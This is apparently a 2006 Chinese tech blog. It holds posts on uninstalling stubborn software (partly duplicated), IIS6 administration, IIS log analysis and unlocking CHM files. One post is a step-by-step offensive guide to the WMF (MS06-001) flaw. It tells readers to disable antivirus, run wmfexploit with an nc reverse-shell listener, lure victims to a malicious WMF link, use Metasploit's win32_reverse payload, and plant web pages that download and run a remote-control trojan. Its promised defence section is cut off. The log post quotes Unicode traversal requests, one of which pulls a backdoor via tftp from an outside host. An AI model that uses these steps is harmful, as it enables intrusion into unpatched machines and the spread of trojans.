首先在“我的电脑”找到Winamp安装目录下的UninstWp.exe程序,复制并粘贴到顽固程序所在的文件夹中,双击运行该程序就可以把顽固程序卸载得干干净净了。
3、运用WinRAR卸载顽固程序
通过其地址栏定位到顽固程序所在文件夹,再点工具栏上的“添加”按纽,此时会弹出“档案文件名字和参数”对话框,在“存档选项”中勾选“存档后删除原文件”点击“确定”,等压缩完成后,WinRAR会自动删除顽固软件文件夹,然后手工将刚生成的压缩包删除,一切搞定。
4、微软反间谍软件完美卸载3721程序
首先下载微软反间谍软件MicrosoftAntiSpywareInstall.exe,界面是英文的,文字相当于高中英语水平,慢慢看能懂,安装后按提示升级最新数据库,执行SCAN,后发现100多个3721,CNS*的东西,选择REMOVE,慢慢的微软反间谍软件清除3721,CNS*的东西,再提示重新启动机器;第一次3721还没清除完,在/PROGRAM FILES/下还有3721目录,先卸载网络实名,右键清除开始——程序菜单中的3721条,再运行微软反间谍软件,扫描后发现多个3721,CNS*的东西,但数量比第一次少多了选择,选择REMOVE,清除3721,CNS*的东西,再重新启动机器,这样就彻底清除3721。
3、运用WinRAR卸载顽固程序
通过其地址栏定位到顽固程序所在文件夹,再点工具栏上的“添加”按纽,此时会弹出“档案文件名字和参数”对话框,在“存档选项”中勾选“存档后删除原文件”点击“确定”,等压缩完成后,WinRAR会自动删除顽固软件文件夹,然后手工将刚生成的压缩包删除,一切搞定。
4、微软反间谍软件完美卸载3721程序
首先下载微软反间谍软件MicrosoftAntiSpywareInstall.exe,界面是英文的,文字相当于高中英语水平,慢慢看能懂,安装后按提示升级最新数据库,执行SCAN,后发现100多个3721,CNS*的东西,选择REMOVE,慢慢的微软反间谍软件清除3721,CNS*的东西,再提示重新启动机器;第一次3721还没清除完,在/PROGRAM FILES/下还有3721目录,先卸载网络实名,右键清除开始——程序菜单中的3721条,再运行微软反间谍软件,扫描后发现多个3721,CNS*的东西,但数量比第一次少多了选择,选择REMOVE,清除3721,CNS*的东西,再重新启动机器,这样就彻底清除3721。
5、运用Windows XP附带的Msicuu.exe、Msizap.exe来彻底卸载顽固程序
首先要打开Windows XP安装盘,点“Support Tools”,进入硬盘的Support Tools安装目录(X:\Program Files\Support Tools),找到Msicuu.exe并双击,于是就会弹出一个“Windows Installer Clean Up”窗口,显示当前已安装的所有程序列表。你从中选择顽固程序,然后单击“Rmove”按钮即可卸载。如果以上方法无效,建议你用Msizap.exe来卸载,方法是:打开注册表编辑器,定位到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall,在左边项中找到顽固程序的标识(例如{268723B7-A994-4286-9F85-B974D5CAFC7B}),然后依次选择“开始→程序→Windows Support Tools→Command Prompt”命令,在命令提示符后,输入以下命令:msizap T {顽固程序的标识},按回车后即可卸载顽固程序。
6、超级兔子优化王专业卸载功能卸载常见顽固软件及IE插件
首先选择优化王下的“卸载软件”功能,然后切换到“专业卸载”选项卡,此处提供了18种软件的卸载功能。超级兔子优化王软件会自动对系统进行检测,若装有该程序的话此处便会显示“已安装”,接着选中要卸载的软件,单击“下一步”就可以把这些程序清理干净,将它们彻底赶出系统。
分类 : 网站技术 | 发表时间 17-04-2006
尽管IIS6.0的推出已有一些时日,相信许多网民使用它管理各类网站已经烂熟于心,不过IIS6.0就像Windows操作系统一样深不见底,要是用力挖掘的话,还是能发现很多新应用技巧的,或许下面提供的几则管理网站的新技巧你并不熟悉。
1、阻止网站耗费太多内存资源
使用IIS6.0管理网站时,常常会遇到网站运行一段时间之后,系统的内存资源占用率往往达到90%左右的情形;在这种情形下继续访问网站时,会明显感觉到网站页面打开速度太慢。为了有效避免这种现象的发生,我们可以巧妙地对IIS6.0中的应用程序池进行设置,让其定时回收不工作的进程,同时有效限制网站最大可以使用的内存数目,确保服务器始终能够稳定地运行。下面就是具体的设置步骤:
依次单击“开始”/“设置”/“控制面板”命令,在打开的控制面板窗口中,双击“管理工具”图标,接着再双击“Internet信息服务管理器”图标,打开IIS6.0的控制台窗口;
用鼠标展开本地计算机下面的“应用程序池”选项,然后右击该选项下面的“DefaultAppPool”,再执行右键菜单中的“属性”命令,在其后弹出的属性设置界面中,单击“回收”标签,进入到如图1所示的标签页面。选中该页面中的“回收工作进程(分钟)”选项,同时在该选项右侧的文本框中输入合适的数值,来指定多长时间不活动的工作进程可以被IIS6.0自动回收;
接下来再将“回收工作进程(请求数目)”选项选中,同时在该选项右侧的文本框中输入合适的数值,来指定多少数目的请求可以回收工作进程。由于回收工作进程也需要耗费一定的系统资源,因此为了避开网站访问高峰期,我们还可以选中“在下列时间回收工作进程”这个选项,并单击“添加”按钮,来添加一个合适的回收时间,例如我们可以将回收时间设置在午夜1点钟左右;
紧接着在“内存回收”设置项处,我们可以选中“最大使用的内存”选项,同时在该选项右侧的文本框中输入合适的数值,来限制网站最大只能使用多大的系统内存。
完成了上面的设置后,再展开IIS6.0控制台窗口中的“网站”项目,并用鼠标右击目标网站的名称,再执行右键菜单中的“属性”命令,然后在弹出的网站属性窗口中单击“主目录”标签,并检查图2标签页面中的应用程序池是否被设置成了“DefaultAppPool”,如果不是的话必须将它调整过来。倘若服务器中还存在其他网站的话,我们再按相同的设置方法,将其他网站的应用程序池也设置为“DefaultAppPool”,最后单击“确定”按钮,这样就能实现阻止网站耗费太多内存资源的目的了。
2、备份网站配置信息
对网站配置信息进行备份已经不是什么新鲜的话题了,不过在IIS以前版本中,对网站配置信息进行备份时,只需要简单地执行一下“备份”命令就可以了;但在IIS6.0管理器中,备份网站配置信息的操作又有点不同,而且新版本的IIS还允许网站管理员对配置信息进行加密备份,以避免隐私配置信息随意传播。下面就是在IIS6.0管理器中,备份网站配置信息的具体操作步骤:
依次单击“开始”/“设置”/“控制面板”命令,在打开的控制面板窗口中,双击“管理工具”图标,接着再双击“Internet信息服务管理器”图标,打开IIS6.0的控制台窗口;
用鼠标展开本地计算机下面的“网站”选项,然后右击该选项下面的目标网站名称,从弹出的右键菜单中依次单击“所有任务”/“将配置保存到一个文件”命令,进入到如图3所示的网站配置信息保存对话框。在该对话框的“文件名”处,输入合适的备份文件名称,在“路径”处设置好备份文件所有保存的具体路径。为保证配置信息不被其他人随意查看,我们最好选择一个已经通过设置严格的访问控制权限来限制对其访问的文件夹,毕竟在这样的文件夹中创建的任何文件都继承访问控制列表。
此外为了进一步提高网站配置信息的安全性,我们还可以将图3界面中的“用密码对配置进行加密”复选项选中,并在“密码”文本框以及“确认密码”文本框中输入强密码,最后单击一下“确定”按钮,这样目标网站的配置信息将被自动保存到一个指定的文件中了。
3、正确应对网站无法显示子页面
不少人在使用IIS6.0管理器安装配置好了网站,并使用IE来尝试访问网站页面时,常常会发现目标网站的主页面能够正常显示,但子页面内容却无法正常显示,这是什么原因呢?其实这种现象仅容易出现在IIS6.0管理器中,遇到这种现象时可以按照如下方法来排除:
依次单击“开始”/“设置”/“控制面板”命令,在打开的控制面板窗口中,双击“管理工具”图标,接着再双击“Internet信息服务管理器”图标,打开IIS6.0的控制台窗口;
用鼠标展开本地计算机下面的“网站”选项,然后右击该选项下面的目标网站名称,从弹出的右键菜单中执行“属性”命令,并单击网站属性界面中的“主目录”标签,然后单击对应标签页面中的“配置”按钮,打开系统的应用程序配置窗口;
接着单击一下该窗口中的“选项”标签,并在弹出的如图4所示的标签页面中,将“启用父路径”复选项选中,最后单击一下“确定”按钮,这样网站无法显示子页面的现象就会消失了。
朋友从网上下载了一个ASPX网站程序,在笔者的帮助下,将该程序解压到安装有Windows 2003操作系统的服务器中,然后在IIS6.0管理器中新建了一个站点,并将该站点的主目录指向了ASPX网站程序所在的目录,不过笔者在访问该网站时,IE浏览器总显示服务器内部出错的提示。笔者认真检查了IIS6.0中的各种配置,没有发现有什么错误的地方,这到底是怎么回事呢?
其实这是由于Windows 2003默认的安全性较高引起的,因为在默认状态下Windows 2003服务器系统并没有开启ASPX页面的访问权限,这需要我们用手工方法才能开启成功,下面就是具体的开启步骤:
依次单击“开始”/“设置”/“控制面板”命令,在打开的控制面板窗口中,双击“管理工具”图标,接着再双击“Internet信息服务管理器”图标,打开IIS6.0的控制台窗口;
用鼠标展开本地计算机下面的“Web服务扩展”选项,进入到如图5所示的选项设置界面;检查该界面右侧区域处的“ASP.NET V1.1.4322” 或“ASP.NET V2.0.50727”的运行状况是否为允许,要是不是的话,必须用鼠标将其选中,同时单击一下“允许”按钮,这样ASPX页面的访问权限就被开启了。倘若在图5所示的选项设置界面右侧区域没有看到类似“ASP.NET V1.1.4322” 或“ASP.NET V2.0.50727”这样的项目时,那就表明Windows 2003系统还不支持ASP.NET服务,此时我们不妨依次单击“开始”/“运行”命令,然后在弹出的系统运行对
话框中,直接输入字符串命令“X:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe -i”(其中X为Windows 操作系统所在的磁盘分区符号),单击回车键后,我们就能在图5所示的选项设置界面右侧区域看到“ASP.NET V1.1.4322”选项了。
分类 : 系统安全 | 发表时间 16-04-2006
就在刚迈入2006年之际,Windows系统出现了一个严重的漏洞,这就是Microsoft Windows图形渲染引擎wmf格式代码漏洞(ms0601)。这个漏洞出现在Windows的图形渲染引擎中,黑客可以构造恶意的wmf文件,引诱其他用户打开,当系统没有更新过wmf补丁时,将会执行黑客事先设置好的恶意代码,获取系统的最高权限,从而完全听命于黑客。就在漏洞公布几天后,网络上使用wmf漏洞进行传播的病毒、攻击事件不断,直至今日,网上仍然充斥着无数利用wmf漏洞的攻击。本文将向大家介绍有关wmf漏洞的知识及防范方法。
由于wmf漏洞涉及的Windows系统版本很多,包括从Windows 98到Windows 2003之间的所有系统版本,因此危害十分巨大。目前利用wmf漏洞的攻击主要包括两类:1.溢出攻击 2.利用漏洞制作的网页木马。前者可以让黑客得到系统的最高权限,后者则可以将受害者的电脑成为黑客的肉鸡。下面我们先来看看黑客是如何利用wmf漏洞的。
一.使用专用溢出工具
wmf漏洞的溢出工具在漏洞公布的几天后就出现在网上,虽然公布时间较早,存在一些缺陷,但是仍然能轻松得将存在漏洞的主机溢出。这款溢出工具名叫wmfexploit。下载后将其解压到c盘(由于溢出程序会被杀毒软件认为是病毒,因此测试时需要将杀毒软件关闭),点“开始”→“运行”,输入“CMD”运行“命令提示符”。在“命令提示符”中进入c盘,输入wmfexploit后就可以查看其使用说明了。其溢出方式有两种:1.反向溢出式 2.主动下载执行式。
1.反向溢出,穿透防火墙
反向溢出的最大好处就是可以穿透防火墙。同时由于wmf漏洞的特殊性,我们无法通过漏洞扫描器来确定哪台主机存在漏洞,因此可以使用反向连接,让有漏洞的主机主动连接本机。
在“命令提示符”中运行wmfexploit后,可以查看其反向溢出的使用说明。其使用方法如下:wmfexploit 1 
设置完成后,我们进入“命令提示符”,然后运行著名的网络工具nc,输入如下命令“nc -vv -l -p 888”,这样nc就开始监听本机的888端口。接着我们就可以引诱目标访问我们的恶意wmf文件了。将网址“http://192.168.0.1:777/any.wmf”发给对方即可。当目标打开这个地址时,就会运行我们捆绑有溢出信息的wmf文件。我们回到用nc监听的窗口,可以看到,目标主机已经成功溢出了。
提示:上文中提到的IP地址192.168.0.1,属于内网IP,只是方便进行本机测试,如果想对外网的主机进行测试,则需要将本机的内网IP改为外网IP。
2.下载执行,直接运行木马
除反向溢出外,wmfexploit还有一种溢出方式就是下载执行式。当目标主机运行恶意wmf文件发生溢出后,不会将shell发送到本机监听的端口上,而是直接从指定的网址上下载一个exe文件运行,这个文件可以是木马,也可以是其他程序。当然我们还需要有一个网页空间,用来放置需要执行的exe文件。
查看下载执行式溢出的使用方法:wmfexploit 2
二.使用图形化的溢出测试系统
metasploit是一款著名的溢出测试系统,几乎可以对目前所有的溢出漏洞进行测试,可以说是所有溢出程序的整合。当然其不是简单得将溢出程序堆放在一起,而是提供了一个方便操作,针对性强的溢出测试平台。这个测试系统的最大优点是使用了一个完全图形化的操作界面,这对于菜鸟进行溢出测试是很方便的。
下载安装metasploit。完成后点击“开始”,运行程序组中的“MSFUpdate”,程序会弹出一个“命令提示符”窗口,显示需要更新的文件列表,输入“yes”回车后就可以开始进行溢出程序更新。更新完毕后运行“MSFweb”,用于开启本机的metasploi浏览服务。然后打开浏览器,在地址栏中输入“http://127.0.0.1:55555”,就可以打开metasploi的操作界面。选择溢出列表中的“Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution”进入漏洞信息界面,然后点击最下方的“0 – Automatic – Windows XP / Windows 2003 / Windows Vista (default)”进行测试,在接着出现的“Select Payload:”选项中选择“win32_reverse”。最后来到溢出相关信息的填写处,在选项中只需设置“HTTPHOST”、“HTTPPORT”、“LHOST”、“LPORT”四项即可,其他保持默认。设置方法和原理与wmfexploit相似,在此不再阐述。
同样将恶意wmf文件的地址发给目标,当对方发生溢出后,我们点击进入metasploit界面上的“SESSIONS”就可以得到一个管理员权限的shell了。
提示:在使用metasploi之前务必进行更新,否则很可能没有wmf漏洞相关的测试选项。
三.利用漏洞制作网页木马
wmf漏洞造成的最大影响就是网络上网页木马满天飞,由于杀毒软件对图片文件的检测功能不够强大,因此利用wmf漏洞制作的网页木马很容易成功,也成了最近网页木马中的主角。下面我们来了解一下wmf网页木马的制作。
首先我们需要准备一款木马程序,这里推荐类似灰鸽子的反弹连接型木马,这样当有目标发生溢出时会通过木马主动连接我们的主机,而无需我们主动连接,方便了对肉鸡的管理。然后将配置好的木马程序服务端放置到网页空间上(可申请免费空间进行存放)。
下载wmf木马的制作程序ms0601。下载完成后在“命令提示符”中运行,可以看到使用方法很简单:ms0601 [THE URL OF EXEFILE],直接输入木马文件所在的网址即可。回车后就可以在同目录下生成一个exploit.wmf文件,运行这个wmf文件将会触发溢出并自动从网页上下载木马文件执行。
将exploit.wmf文件上传到网页空间中。最后我们需要在网站主页的源代码中插入如下一句代码:。这样当别人访问主页时,将不会弹出新的浏览器窗口,而是直接运行exploit.wmf进行溢出。
四.填漏洞,防木马
由于wmf漏洞的公布时间较晚,因此网络上还有很多没有打好补丁的系统。无论是溢出还是网页木马,成功率都很高,这也给病毒和木马的传播提供了途径。在了解了黑客如何利用wmf漏洞后,我们再来看看如何才能填补漏洞,防范利用wmf漏
分类 : 系统安全 | 发表时间 16-04-2006
如今各式各样的Windows漏洞层出不穷,五花八门的入侵工具更是令人眼花缭乱,稍微懂点网络知识的人都可以利用各种入侵工具进行入侵,这可给我们的网管带来了很大的麻烦,虽然经过精心配置的服务器可以抵御大部分入侵,但随着不断新出的漏洞,再高明的网管也不敢保证一台务器长时间不会被侵入,所以,安全配置服务器并不能永远阻止黑客入侵,而如何检测入侵者行动以保证服务器安全性就在这样的情况下显得非常重要。
日志文件作为微软Windows系列操作系统中的一个特殊文件,在安全方面具有无可替代的价值。它每天为我们忠实地记录下系统所发生一切事件,利用它可以使系统管理员快速对潜在的系统入侵作出记录和预测,但遗憾的是目前绝大多数的人都忽略了它的存在,反而是因为黑客们光临才会使我们想起这个重要的系统日志文件,很有讽刺意味。
在这里我们就不去讲什么日志文件的默认位置、常见备份方法等基本技巧了,这样的东西黑防以前讲得很清楚了,大家可以翻看黑防以前的杂志学习这些东西,我们今天来看看如何分析常见的日志文件吧!
1.FTP日志分析
FTP日志和WWW日志在默认情况下,每天生成一个日志文件,包含了该日的一切记录,文件名通常为ex(年份)(月份)(日期)。例如ex040419,就是2004年4月19日产生的日志,用记事本可直接打开,普通的有入侵行为的日志一般是这样的:
#Software: Microsoft Internet Information Services 5.0(微软IIS5.0)
#Version: 1.0 (版本1.0)
#Date: 20040419 0315 (服务启动时间日期)
#Fields: time cip csmethod csuristem scstatus
0315 127.0.0.1 [1]USER administator 331(IP地址为127.0.0.1用户名为administator试图登录)
0318 127.0.0.1 [1]PASS – 530(登录失败)
032:04 127.0.0.1 [1]USER nt 331(IP地址为127.0.0.1用户名为nt的用户试图登录)
032:06 127.0.0.1 [1]PASS – 530(登录失败)
032:09 127.0.0.1 [1]USER cyz 331(IP地址为127.0.0.1用户名为cyz的用户试图登录)
0322 127.0.0.1 [1]PASS – 530(登录失败)
0322 127.0.0.1 [1]USER administrator 331(IP地址为127.0.0.1用户名为administrator试图登录)
0324 127.0.0.1 [1]PASS – 230(登录成功)
0321 127.0.0.1 [1]MKD nt 550(新建目录失败)
0325 127.0.0.1 [1]QUIT – 550(退出FTP程序)
从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统,换了四次用户名和密码才成功,管理员立即就可以得知这个IP至少有入侵企图!而他的入侵时间、IP地址以及探测的用户名都很清楚的记录在日志上。如上例入侵者最终是用Administrator用户名进入的,那么就要考虑此用户名是不是密码失窃?还是被别人利用?接下来就要想想系统出什么问题了。
2.WWW日志分析
WWW服务同FTP服务一样,产生的日志也是在%systemroot%\sys tem32\LogFiles\W3SVC1目录下,默认是每天一个日志文件。这里需要特别说明一下,因为Web的日志和其他日志不同,它的分析要细致得多,需要管理员有丰富的入侵、防护知识,并且要足够的细心,不然,很容易遗漏那种很简单的日志,而通常这样的日志又是非常关键的。由于我们不可能一个一个分析,所以这里举个简单例子:
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 20040419 03:091
#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)
20040419 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
20040419 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
通过分析第六行,可以看出2004年5月19日,IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口,查看了一个页面iisstart.asp,这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt,有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。
对现在非常常见的SQL注入式攻击,通过对put、get的检查,也可以大概判断是那个页面出了问题,从而修补。
3.HTTPD事务日志的分析
Microsoft的IIS 5自公布到现在,被黑客利用的漏洞多不胜数,像.ida/.idq、unicode、WebDavx3和一些未知的漏洞,我们分析日志的目的就是为了分析黑客入侵的行为,对于没有打好补丁包的系统被黑客成功入侵的日志记录分别对应如下。为了给大家介绍一个比较醒目的介绍,专门配置了个“古老”的服务器,用旧漏洞给大家做个演示,很容易触类旁通就懂其它了。
(1)unicode漏洞入侵日志记录
这个是个非常经典的漏洞了,要找这样的服务器估计得去国外慢慢找了,但是因为它的日志是最经典的一个,所以我们这里特别拿它来做个示范。
我们打开IIS5的Web服务的日志文件,日志文件默认位置在%systemroot%\system32\LogFiles\文件夹下,如图1所示是一个典型的Unicode漏洞入侵行为的日志记录,对于正常的Web访问,是通过80端口用GET命令获取Web数据,但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此漏洞。如图一所示。
我们配合入侵来看下这样的记录:通过下面的编码我们在入侵的时候可以查看目标机的目录文件:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
则日志中会记录下此访问行为:
2004-04-19 08:47:47 192.168.0.1 – 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 200 -
看到了吗?我们的日志中记录地一清二楚,来自192.168.0.1的攻击者查看我们的目录。下面一行是向我们的机器传送后门程序的日志记录:
2004-04-19 08:47:47 192.168.0.1 – 192.168.0.218 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\httpodbc.dll
502 –
看到了吧?记录非常详细的,系统里面那个程序在响应都记录了下来,这样我们分析入侵行为就好办了。
(2)WebDavx3远程溢出日志记录
过去一段时间有名的Wevdavx3漏洞是应用最广泛的,如果系统遭受了此远程溢出的攻击行为,则日志记录如图二所示。
2004-04-19 07:20:13 192.168.0.218 – 192.168.0.218 80 LOCK
/AAAAA……
这表示我们的Web服务受到了来自192.168.0.218的攻击,并锁定(即关闭)了WEB服务,后面的一些乱码字符是在溢出攻击时使用的偏移位猜过程。
上面的几种日杂都记录了有入侵行为的IP地址,但此IP地址说不定就是攻击者使用了跳板,也就是说此IP很可能是“肉鸡”而不是攻击者的IP,遇到这样的情况,我们再查看其他日志文件,还是有可能追查出攻击者的位置的,但这个就完全靠管理员的经验了。
4.日志文件的移位保护
通过上面的几个方法,大家应该可以检测普通的系统攻击了,但话说回来,如果上面的攻击任何一个成功了,那现在我们都看不到日志了,早被入侵者清空了,所以,为了防患于未然,我们还是针对常见的删除日志的方法,把日志挪挪吧。
好多文章介绍对事件日
分类 : 网络日志 | 发表时间 15-04-2006
有些方法当然是反编译 CHM 文件,将里面的限制代码去除后再编译成 CHM 文件,不过这样比较麻烦。
其实 CHM 文件里的内容大多是 HTML 文件,而通过加入脚本可以屏蔽鼠标右键、鼠标选择等操作,所以我们通过更改本地的区域安全设置就可以达到解决限制的目的。
即通过更改“Internet 属性”里的“我的电脑”区域的“安全设置”(此“我的电脑”默认是不显示的),通过它来屏蔽脚本就可以解除 CHM 文件中的限制了。
定位到注册表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0],将这个注册表项导出后备份,然后将右边窗口的“Flags”改成“db”(十六进制的,如果是十进制则是219),确定后关闭注册表,然后右击桌面的“Internet Explorer”→属性→打开“Internet 属性”→安全→这时你会发现多了一个“我的电脑”,选择它后点“自定义级别”,然后找到“活动脚本”的选项→把它选择为“禁用”→确定,这时你再打开 CHM 文件就不会有限制了。
最后,如果要恢复“我的电脑”的默认级别,只要把前面导出的备份注册表文件重新导入即可。
另外,“我的电脑”区域的安全级别一般情况下不要乱动,否则会出现一些问题。
